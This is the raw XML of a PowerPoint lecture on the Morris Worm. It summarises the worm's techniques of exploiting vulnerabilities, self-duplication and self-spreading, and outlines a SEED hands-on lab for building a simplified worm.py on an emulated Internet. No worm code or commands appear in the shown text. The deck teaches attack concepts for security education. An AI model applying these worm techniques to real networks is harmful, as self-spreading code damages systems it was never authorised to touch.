                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1.2.3.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1869955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8C88-617B-0396-A63C-73BAF75E8646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observations in nodes (optional)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8165CE4-4BF3-5C37-805D-C409906AC5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117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B3A41F-3CF8-1474-A9B8-240E1134278D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302993" y="1064111"/>
            <a:ext cx="7962520" cy="4727089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="524073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8DF82-D342-7198-001F-580EC4678612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1877460" y="976438"/>
            <a:ext cx="7980136" cy="4905123"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1726629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C6934-3252-18C1-D977-96727CA4513F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567377" y="708805"/>
            <a:ext cx="8338230" cy="5440390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F1E056-3ACC-CBD2-E30E-41E13E226020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7298111" y="3333728"/>
            <a:ext cx="2550122" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>badfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> doesn’t change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>keeps changing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99250E8B-6E73-7F52-0417-BD1899AA9ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6713415" y="2055446"/>
            <a:ext cx="664308" cy="127828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F96B11E5-6E38-B640-3C93-0FC9BAA68373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760308" y="3429000"/>
            <a:ext cx="537803"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8EDE5C28-D8A7-9B55-2421-B4E9280E5096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6713415" y="3429000"/>
            <a:ext cx="664308" cy="137746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5797AAEC-AB6E-018E-6F76-486B82555B87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760308" y="2860431"/>
            <a:ext cx="890954" cy="10649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E63BA847-6E70-BD77-AB03-BFB619F08293}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6760308" y="3888154"/>
            <a:ext cx="988646" cy="168421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1317D27-7182-36BC-AB43-398A68287959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6908675" y="3975087"/>
            <a:ext cx="887172" cy="16362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3963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5394-6AA6-85EC-DE7F-7D546D713D80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why study Morris Worm? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C12B4C75-A2C5-9E40-12A8-B46F6FF1F578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Morris Worm vs. Ransomware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The techniques are still the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>self-duplication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>self-spreading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>non-destructive vs. asking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="urw-din"/>
              </a:rPr>
              <a:t>ransom fee (WannaCry) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:latin typeface="urw-din"/>
              </a:rPr>
              <a:t>A virtual lab design by Wenliang Du at Syracuse university in 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="273239"/>
              </a:solidFill>
              <a:latin typeface="urw-din"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163330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DFE2D-F513-9FDA-E808-7FDF61BD678E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hands-on Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3EF985-1A6A-8597-E70B-89602470E6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0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8297-06FF-0C89-D539-2533892254E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Morris attack environment setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE7D8D72-35EC-9689-C22D-ED73BB007287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install seed VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Running on an Internet emulator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A simplified version of the attack code written in Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>online manual: https://seedsecuritylabs.org/Labs_20.04/Files/Morris_Worm/Morris_Worm.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205011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DFE2D-F513-9FDA-E808-7FDF61BD678E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hands-on Lab (1): Install seed VM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3EF985-1A6A-8597-E70B-89602470E6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04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F82EC796-B583-EEA6-4C98-8EF889926942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585981" y="1247939"/>
            <a:ext cx="8201890" cy="5022038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91DC025D-1EF2-61B8-896D-3EB6308BCB40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552988" y="3971225"/>
            <a:ext cx="1371600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="D81E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AC58FE-B157-2099-0994-809B980D55B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585981" y="878607"/>
            <a:ext cx="2689240" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download Ubuntu Image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180300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5760</TotalTime>
  <Words>1603</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>235</Paragraphs>
  <Slides>48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urw-din</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Britannic Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>OCRB</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Morris Worm Attack</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>What is Morris Worm?</vt:lpstr>
      <vt:lpstr>Attacking Method</vt:lpstr>
      <vt:lpstr>Why study Morris Worm? </vt:lpstr>
      <vt:lpstr>Hands-on Lab</vt:lpstr>
      <vt:lpstr>Morris attack environment setup</vt:lpstr>
      <vt:lpstr>Hands-on Lab (1): Install seed VM</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hands-on Lab (2): Build a nano Internet</vt:lpstr>
      <vt:lpstr>The Internet Emulator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nano internet</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Visualize nano internet</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hands-on Lab (3): Create the worm</vt:lpstr>
      <vt:lpstr>Characters of the lab’s worm.py</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Solution</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Clean up</vt:lpstr>
      <vt:lpstr>Debugging</vt:lpstr>
      <vt:lpstr>Observations in nodes (optional)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cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-18T02:02:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-20T23:58:05Z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707a-0714-4b19-9e75-9e86a08e862d_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_SetDate">
    <vt:lpwstr>2022-09-06T13:13:19Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_Name">
    <vt:lpwstr>defa4170-0d19-0005-0004-bc88714345d2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_SiteId">
    <vt:lpwstr>e902b1b3-068c-446e-83b4-e3dfa474e6f9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_ActionId">
    <vt:lpwstr>f0675eab-ace3-45f5-9222-bc2126050246</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>